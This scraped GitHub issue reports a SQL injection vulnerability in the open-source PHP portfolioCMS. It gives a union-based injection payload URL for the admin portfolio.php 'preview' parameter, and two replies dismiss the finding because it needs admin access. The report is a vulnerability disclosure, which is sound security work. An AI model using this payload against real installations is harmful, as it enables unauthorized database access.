Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
portfolioCMS is free open source file with PHP. There is a SQL injection vulnerability in the portfoliocms We can get the source code : https://github.com/teklynk/portfolioCMS
the SQL injection use like this: 1.install the portfoliocms,for example :http://127.0.0.1/cms/portfoliocms/admin/portfolio.php?preview=25 the sql injection payload: http://127.0.0.1/cms/portfoliocms/admin/portfolio.php?preview=25' and 1=2 union all select 1,user() %23
The text was updated successfully, but these errors were encountered:
Need admin authority? It is too tasteless
Sorry, something went wrong.
垃圾cms, 垃圾注入, 您不觉得您是来搞笑的吗?
No branches or pull requests
portfolioCMS is free open source file with PHP. There is a SQL injection vulnerability in the portfoliocms
We can get the source code :
https://github.com/teklynk/portfolioCMS
the SQL injection use like this:

1.install the portfoliocms,for example :http://127.0.0.1/cms/portfoliocms/admin/portfolio.php?preview=25
the sql injection payload:
http://127.0.0.1/cms/portfoliocms/admin/portfolio.php?preview=25' and 1=2 union all select 1,user() %23
The text was updated successfully, but these errors were encountered: